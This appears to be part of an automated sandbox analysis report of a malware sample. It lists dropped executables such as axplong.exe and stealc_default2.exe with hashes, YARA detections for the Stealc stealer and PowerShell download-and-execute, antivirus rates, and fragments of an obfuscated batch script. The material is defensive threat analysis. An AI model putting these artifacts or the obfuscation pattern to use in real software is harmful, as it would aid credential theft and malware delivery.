Entropy (8bit):	7.900714169654733
Encrypted:	false
SSDEEP:	12288:MsRdHtAen6l3rvhfSeXPKi5FbSyPFZ8YtGLVv5QMG4D5tXwVK+oOZkqDePvzOln5:NdeZvhzPK29SmKOGWMP4Bqta9cai9
MD5:	A5CF5DE46EC3F0A677E94188B19E7862
SHA1:	D07E3FD100C423662DBB3ED85713FF7B87C52E60
SHA-256:	450AC7367B33AC0D26EE08C5371BA668D9D3331A8C119520EB5CA4A46F91973C
SHA-512:	1D2D91625F971F71670A36340092AB9AC0A35A4AC791A46EE8B055894CDF3B7FC7030E4D27F973D738B85295C31A4BFBE5C033B07A5F7EBF10508D75043C1AB1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................s........'....'..............'.....&....&8....&...Rich..................PE..L...r..g...............).,...........j.......@....@.......................... ............@.....................................<...............................L......................................@............@..@............................text...=+.......,.................. ..`.rdata.......@.......0..............@..@.data...h...........................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000004001\zxcv.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1103872
Entropy (8bit):	7.900714169654733
Encrypted:	false
SSDEEP:	12288:MsRdHtAen6l3rvhfSeXPKi5FbSyPFZ8YtGLVv5QMG4D5tXwVK+oOZkqDePvzOln5:NdeZvhzPK29SmKOGWMP4Bqta9cai9
MD5:	A5CF5DE46EC3F0A677E94188B19E7862
SHA1:	D07E3FD100C423662DBB3ED85713FF7B87C52E60
SHA-256:	450AC7367B33AC0D26EE08C5371BA668D9D3331A8C119520EB5CA4A46F91973C
SHA-512:	1D2D91625F971F71670A36340092AB9AC0A35A4AC791A46EE8B055894CDF3B7FC7030E4D27F973D738B85295C31A4BFBE5C033B07A5F7EBF10508D75043C1AB1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................s........'....'..............'.....&....&8....&...Rich..................PE..L...r..g...............).,...........j.......@....@.......................... ............@.....................................<...............................L......................................@............@..@............................text...=+.......,.................. ..`.rdata.......@.......0..............@..@.data...h...........................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	314368
Entropy (8bit):	6.339215930674792
Encrypted:	false
SSDEEP:	6144:k0wBiMDYtUokCulxMfpbjnekAoQGZRFsnE7w+Uw3NKR9hU/W9:RwMtUoH35nLP7Fa4wx8KRF9
MD5:	68A99CF42959DC6406AF26E91D39F523
SHA1:	F11DB933A83400136DC992820F485E0B73F1B933
SHA-256:	C200DDB7B54F8FA4E3ACB6671F5FA0A13D54BD41B978D13E336F0497F46244F3
SHA-512:	7342073378D188912B3E7C6BE498055DDF48F04C8DEF8E87C630C69294BCFD0802280BABE8F86B88EAED40E983BCF054E527F457BB941C584B6EA54AD0F0AA75
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L...K..g......................$......i............@...........................&...........@.................................@...<.............................%..$...................................................................................text............................... ....rdata..............................@..@.data.....#.........................@....reloc...E....%..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000474001\gold.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4329984
Entropy (8bit):	7.952276143427268
Encrypted:	false
SSDEEP:	98304:Jd07g+iFgaV7rHLvHC3mPFGA/+3K10KNbYDIVL:JzlgaxjLPHdNFNH
MD5:	9E675BBAF944EEEE4F1E7428A5B22C95
SHA1:	6714982450CC5D21B6C1DF2A0603755F6BC41D07
SHA-256:	DEDDD900CD271A593BC41F4218B1E2AAB3465F210EC92D4597C44BB79414E755
SHA-512:	A853288DB2C220B8E3FCA72A01CDC147055B58A336FC1C58120C3973462AE83D510C7DA5E1073D225E7AA122FCD3354C6E23B1D48DE9D2E24C5CC26D1D7CD2C0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............................c.. ...@....@.. ................................B...`.................................:...P.....................A............................................................................................. . ... ...................... ..` .....@...,..................@..@ .....`.......D..............@..B.idata... ...........F..............@....rsrc................H..............@..@.themida. N..........Z..............`....boot.....-...c...-..Z..............`..`........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	7824384
Entropy (8bit):	5.747035776604823
Encrypted:	false
SSDEEP:	49152:YomfenSX/V2zFG68rcfghczzPef7pU4Uyy2tSh4umR9+zIeah09aMDKjbaI1U2Sf:YomQ42zYrUgc/P8q4UyD4hkWzFK71
MD5:	563E12FFD633CFB480AB1F3153676D22
SHA1:	28F104D5D1336C20A99D5BC3208D74351E3D8C90
SHA-256:	B7439CB886010A0F42601044FF3B1FF2CD11873A6E16B6682CBA31E052F5865D
SHA-512:	1A2BCAA8B42A25F8A014D2549787430046814A72BAF16E798B21226B8003ABEF6A71E4831D92A90B8B810E47257BEB79E18A4C1930C2F0EA2817A2ACE8676E6C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g...............(..I..`w..2...........0I...@...........................w.....&.w...@... ..............................pt.P(............................t...............................s......................wt.p............................text.....I.......I.................`..`.data...`_...0I..`....I.............@....rdata...k...._..l...\|_.............@..@.eh_framP/....t..0....s.............@..@.bss....`1...0t..........................idata..P(...pt..*....t.............@....CRT....0.....t......Bt.............@....tls..........t......Dt.............@....reloc........t......Ft.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	527360
Entropy (8bit):	7.479171546100309
Encrypted:	false
SSDEEP:	12288:GWFI4Hnedq5EL4739r+Xpph6s2V/m2CB9EKS:w4+d747NOChVnCBF
MD5:	A904AE8B26C7D421140BE930266ED425
SHA1:	C2E246B9197C18D6D40D9477A8E9A2D74A83B0E2
SHA-256:	9D3380EE1CCAAE63CA9F39E86630FFE877D0E3ECB711D87DC02350922595DC84
SHA-512:	2DBD601A564F7FFC1609BFB05ED55D57AFB9BDD9BEC1E9091DEB53FCFA9FA02A7BA59825F2B9C3777D2016D724A8263808331356F569A1ECAE585422E040F3BE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A......A...A...A..@...A..@...A..@...A..@...A...A]..A.#.@...A.#.@...A.#.@H..AM".@...AM".@...AM"zA...AM".@...ARich...A................PE..L....-.g...............)............Hd....... ....@..........................@............@.........................p...X......(...............................\|.......................................@............ ..,............................text............................... ..`.rdata..\|.... ......................@..@.data...............................@....rsrc...............................@..@.reloc..\|...........................@..B.bsp.....0.......0.......................bsp.....0.......0......................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000802001\1.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	7344640
Entropy (8bit):	5.917370216175585
Encrypted:	false
SSDEEP:	49152:EhuZ6dXbrEWb2JG1YdEK4pvRLPo4VVEdP9/AG9GSgpvcdrFeBhem2Y8oKUbzJ1kI:Eh9lEWn1ya9NPRqd1oGLgx6rmHKa
MD5:	BF43ACACD11D09300691CF9449C386D1
SHA1:	FF7D6F2FBAD4851CEA65811FB1F5DF83184510F5
SHA-256:	9415E13F69BCE584AA0E94BA833D689F892D27960F6B6B353F439E4AEE32B1AA
SHA-512:	170A2695AC6C918C4F3B5DA6D59B2DE4BBF454F3ABE9FE4FFB9B32314F8E4731773923FE04ACB66C31DDB47877A9DBD500D8A561532FA1A152FEB69F4A945CDB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p..g...............(..E...p..2............E...@...........................p.......p...@... .............................. m.P(...........................pm.0...........................P.l......................'m.p............................text...<.E.......E.................`..`.data...`\|....E..~....E.............@....rdata..Hj...@X..l...,X.............@..@.eh_framP/....l..0....l.............@..@.bss....`1....l..........................idata..P(... m..*....l.............@....CRT....0....Pm.......l.............@....tls.........`m.......l.............@....reloc..0....pm.......l.............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000808001\12.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	22
Entropy (8bit):	3.606936732175321
Encrypted:	false
SSDEEP:	3:hMUSABn:hdB
MD5:	EA73AAD98598E9A7F10C51707D04E544
SHA1:	A33DF5835D8F08D063269967DCADB9DF0B9D0A64
SHA-256:	1CDA304D4D3E844020F6D8BED978BCCAB6BBB3CC4099F8405694D8D7F59883EA
SHA-512:	C5D637853B5665A25704CDBFA74D26D70142D966A72B85922D34E724F7644691B4B424B200C560A821C8446B5BFC9132E5D858ECCC6FB47D616C582783C08258
Malicious:	false
Reputation:	unknown
Preview:	This ip is not allowed

C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1224767
Entropy (8bit):	7.973762647331916
Encrypted:	false
SSDEEP:	24576:G/e3qkBTWU2YmUQEg/IcuH+PtJ1NFDk6S2JPxeRcMZYj2I:wsgUzg/TuelJHDDTeVuJ
MD5:	5D97C2475C8A4D52E140EF4650D1028B
SHA1:	DA20D0A43D6F8DB44FF8212875A7E0F7BB223223
SHA-256:	F34DD7EC6030B1879D60FAA8705FA1668ADC210DDD52BCB2B0C2406606C5BCCF
SHA-512:	22C684B21D0A9EB2EAA47329832E8EE64B003CFB3A9A5D8B719445A8532B18AAD913F84025A27C95296EBEB34920FA62D64F28145CCFA3AA7D82BA95381924EE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...N...B...8............@..................................P....@.................................4........@.................h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2............2..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000828001\12.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	22
Entropy (8bit):	3.606936732175321
Encrypted:	false
SSDEEP:	3:hMUSABn:hdB
MD5:	EA73AAD98598E9A7F10C51707D04E544
SHA1:	A33DF5835D8F08D063269967DCADB9DF0B9D0A64
SHA-256:	1CDA304D4D3E844020F6D8BED978BCCAB6BBB3CC4099F8405694D8D7F59883EA
SHA-512:	C5D637853B5665A25704CDBFA74D26D70142D966A72B85922D34E724F7644691B4B424B200C560A821C8446B5BFC9132E5D858ECCC6FB47D616C582783C08258
Malicious:	false
Reputation:	unknown
Preview:	This ip is not allowed

C:\Users\user\AppData\Local\Temp\1000833001\13a34faa3c.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	526848
Entropy (8bit):	7.806472978332927
Encrypted:	false
SSDEEP:	12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
MD5:	26D8D52BAC8F4615861F39E118EFA28D
SHA1:	EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
SHA-256:	8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
SHA-512:	1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....z.,..{....,..{....o......(........0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..

C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3011584
Entropy (8bit):	6.539089461950209
Encrypted:	false
SSDEEP:	49152:mPrlDbNZ0b3OdQhNcA8gE6S42+YMXPvz9Ow:mPrlnNQ3OdQhNc08+YMjR
MD5:	FA715FFB10963C654D62D2690ACAE23D
SHA1:	1DF23F6B6E0186A44CCFD61EDA1BFBA1CA392A16
SHA-256:	71FDDFCBB9B46090AC6EB8D267996DFD3A134A63178CB4EDAE435EF6733623A9
SHA-512:	587B47BA0EDEA5701FFBA8E935ADCDAACA2897660C0C537D5D40B7FFD8C92A74FDEF9FEA6862A517183837DF121BBFB4011EBB8DF876A2996304FBD4FAEEE77A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............1...........@..........................01...........@.................................T...h................................................................................................................... . .........~..................@....rsrc ............................@....idata ............................@...nnxuuolc.@+......>+.................@...fjnjtzun......0.......-.............@....taggant.0....1.."....-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1853952
Entropy (8bit):	7.947344940941486
Encrypted:	false
SSDEEP:	24576:A8cvSN7BKQW3k9J2kunNUiS0DIh++xT+UnkhKRBXYSfMPYrG9SuFnmxpw/KxKOIE:ASN7BCk9J2kQUiSwI4mn4SkYPZPxH61
MD5:	79844A66D5D7D52EC7836502F3F917FC
SHA1:	66DE2AD92E97CF9F2C14B5E298472E7AA235FE4A
SHA-256:	F9319BFF5345C5585E6B7A39CAD8DE769EBBAFCA43C688EC26EFC2243B98C06E
SHA-512:	6214B4FF9193CAFDF385114FAEE74DA4F79F2573F0874B4FE1A75A7AFB9A8FDE6FF24BB3897F8D0B05DF9868E44D612489AD0D022C876FECFA8EF7F6B5A7061B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L...9$.g......................$.......i...........@...........................j.....q$....@.................................P.%.d.............................%..................................................................................... . ..%......(..................@....rsrc ......%......8..............@....idata ......%......8..............@... ..*...%......:..............@...hbhagroj......O......<..............@...weowoivy......i......$..............@....taggant.0....i.."...(..............@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000877001\25e6c25320.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2990592
Entropy (8bit):	6.562166875320249
Encrypted:	false
SSDEEP:	49152:+yLdLzWacCDOuJ4tS3eAnaSJTRvrb3HZtpILG870CkQG+qu8:+WdLzWacC6y403znaS19rzZtpILG870f
MD5:	1BC9298F1A5A5DBC8CB6A791CA64043C
SHA1:	DC741C7745B7529E441B1C093F08EA287B2BB8E9
SHA-256:	0E4DB09BC6AE3BB5689D41DB43D9DCDF09CC2B13C8E9BCBF015F5BB7A8D2C5A9
SHA-512:	16D81C89910873B4C14FE49890B0E02FFABE26EC19789AEA74D534CBCD7BDAC084FABA91F9AB46514D528054B050928863F60666926A9ADA9B802EDAEBD4CC22
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................0.......-...@.................................T...h................................................................................................................... . .........~..................@....rsrc ............................@....idata ............................@...vizvkyid..........................@...ekdkgglk......0......\|-.............@....taggant.0....0.."....-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000878001\84d15ff2c9.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1853952
Entropy (8bit):	7.947344940941486
Encrypted:	false
SSDEEP:	24576:A8cvSN7BKQW3k9J2kunNUiS0DIh++xT+UnkhKRBXYSfMPYrG9SuFnmxpw/KxKOIE:ASN7BCk9J2kQUiSwI4mn4SkYPZPxH61
MD5:	79844A66D5D7D52EC7836502F3F917FC
SHA1:	66DE2AD92E97CF9F2C14B5E298472E7AA235FE4A
SHA-256:	F9319BFF5345C5585E6B7A39CAD8DE769EBBAFCA43C688EC26EFC2243B98C06E
SHA-512:	6214B4FF9193CAFDF385114FAEE74DA4F79F2573F0874B4FE1A75A7AFB9A8FDE6FF24BB3897F8D0B05DF9868E44D612489AD0D022C876FECFA8EF7F6B5A7061B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C..............X......m.......Y.......p.....y.........`...............\......n.....Rich............PE..L...9$.g......................$.......i...........@...........................j.....q$....@.................................P.%.d.............................%..................................................................................... . ..%......(..................@....rsrc ......%......8..............@....idata ......%......8..............@... ..*...%......:..............@...hbhagroj......O......<..............@...weowoivy......i......$..............@....taggant.0....i.."...(..............@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000879001\03564c0e08.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2990592
Entropy (8bit):	6.562166875320249
Encrypted:	false
SSDEEP:	49152:+yLdLzWacCDOuJ4tS3eAnaSJTRvrb3HZtpILG870CkQG+qu8:+WdLzWacC6y403znaS19rzZtpILG870f
MD5:	1BC9298F1A5A5DBC8CB6A791CA64043C
SHA1:	DC741C7745B7529E441B1C093F08EA287B2BB8E9
SHA-256:	0E4DB09BC6AE3BB5689D41DB43D9DCDF09CC2B13C8E9BCBF015F5BB7A8D2C5A9
SHA-512:	16D81C89910873B4C14FE49890B0E02FFABE26EC19789AEA74D534CBCD7BDAC084FABA91F9AB46514D528054B050928863F60666926A9ADA9B802EDAEBD4CC22
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@...........................0.......-...@.................................T...h................................................................................................................... . .........~..................@....rsrc ............................@....idata ............................@...vizvkyid..........................@...ekdkgglk......0......\|-.............@....taggant.0....0.."....-.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\197036\T

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	594650
Entropy (8bit):	7.9996649139256055
Encrypted:	true
SSDEEP:	12288:38tfmUx7zSsIfrhCw5PeXvQXFSSdHDBu4ceeEl2a/uJ2:38hxasKfPeXv4AgHFu4c4l9/Z
MD5:	4B0812FABC1BA34D8D45D28180F6C75F
SHA1:	B9D99C00A6F9D5F23E244CC0555F82A7D0EEB950
SHA-256:	73312C3EA63FAF89E2067E034A9148BF73EFB5140C1BA6A67AAF62170EE98103
SHA-512:	7F72FFD39F7B66EA701EC642A427C90F9C3EE9BE69A3E431C492BE76AE9A73E8B2B1FBB16553A5A6D8722BAF30B2A392A47C7C998D618459BF398D47D218D158
Malicious:	false
Reputation:	unknown
Preview:	A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..\|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..\|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....\|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..\|.....;.e.\|.g.0.^i..f.._e:...0/.....'.[.........A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....-....

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1910272
Entropy (8bit):	7.94770125296494
Encrypted:	false
SSDEEP:	49152:bdEDT3RwDlTE5j9+/emT+E7Ei7/Lt5Yge:bMh8E5xZMd/Lth
MD5:	F257F5EF2A5F13CD994E48884B58AF95
SHA1:	635975A431D3898AA6F4C049772B5082E6AD275E
SHA-256:	F463BB94CE95CE298BF3D1EA7C262B22363061F6340F14C688D22CF696063F47
SHA-512:	07F7072C1DF049D3F5816790D4DA719DB4507F7FFFB63F4767F4F73744C90202F7E04EBFC8569B1C79C7239170AE41E3002E762D2B57C756A354E9642220B2AA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f.............................0K...........@..........................`K......u....@.................................W...k.............................K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... .`*.........................@...iknsbfcc......1.....................@...rwdyrkuv..... K.....................@....taggant.0...0K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\Beijing

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	ASCII text, with very long lines (1251), with CRLF line terminators
Category:	dropped
Size (bytes):	25056
Entropy (8bit):	5.097145047047532
Encrypted:	false
SSDEEP:	768:zm7k5aS8bpJSQ/QZ8btc/2LgQf4nxr251E8tangG:qk5aKQIWtc/2LgQf4nxrU1HtangG
MD5:	2A84A77AD125A30E442D57C63C18E00E
SHA1:	68567EE0D279087A12374C10A8B7981F401B20B8
SHA-256:	0C6EAD18E99077A5DDE401987A0674B156C07CCF9B7796768DF8E881923E1769
SHA-512:	9D6A720F970F8D24ED4C74BED25C5E21C90191930B0CC7E310C8DD45F6ED7A0B3D9B3ABBD8F0B4979F992C90630D215B1852B3242C5D0A6E7A42ECEF03C0076A
Malicious:	false
Reputation:	unknown
Preview:	Set Cassette=i..xoayWebcam-Hosting-Mel-Yearly-Supposed-Mean-Higher-Necklace-..pxCriterion-Step-Gives-..dPNudist-Institutes-Prompt-Similarly-Ebook-Smoke-Deer-..ClrcHours-Lone-Rubber-Controller-Judges-Permits-Party-..PWCharming-Refer-Accused-..HdBarely-Gay-Outputs-Kelly-Fed-Documentcreatetextnode-Nylon-..oGSubstances-Guidance-Calculated-Saved-Proteins-Stats-Prince-Balloon-..CIInvestigations-Sip-..vICConsider-Assumes-Departure-Jam-Ya-Alloy-Assault-Ur-..Set Lawrence=M..XKuIx-Entitled-Bored-Preserve-Sandwich-..yLMBankruptcy-Render-..GySAnswered-Anaheim-Sword-Driver-Uniprotkb-..RGConstraint-Polo-Jeep-Jpeg-..SLPut-Territory-Point-States-Production-Mag-R-..FlHorizontal-Vote-Villages-Msgid-Lebanon-Bon-Tours-..jpBpAssisted-Furnished-Cubic-..Set Alexander=e..HcgMazda-Eds-Mime-Remark-Description-Und-Mesh-Independently-Tall-..ZtInstructors-Ibm-Str-Drug-..SfVacancies-Qld-Goat-Did-..enRp-Food-Feature-Occupations-..zhJXLaunch-Retained-Gilbert-Administered-Member-..OqStockings-Indeed-Dot-Liver-Maximize

C:\Users\user\AppData\Local\Temp\Beijing.bat

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1251), with CRLF line terminators
Category:	dropped
Size (bytes):	25056
Entropy (8bit):	5.097145047047532
Encrypted:	false
SSDEEP:	768:zm7k5aS8bpJSQ/QZ8btc/2LgQf4nxr251E8tangG:qk5aKQIWtc/2LgQf4nxrU1HtangG
MD5:	2A84A77AD125A30E442D57C63C18E00E
SHA1:	68567EE0D279087A12374C10A8B7981F401B20B8
SHA-256:	0C6EAD18E99077A5DDE401987A0674B156C07CCF9B7796768DF8E881923E1769
SHA-512:	9D6A720F970F8D24ED4C74BED25C5E21C90191930B0CC7E310C8DD45F6ED7A0B3D9B3ABBD8F0B4979F992C90630D215B1852B3242C5D0A6E7A42ECEF03C0076A
Malicious:	false
Reputation:	unknown
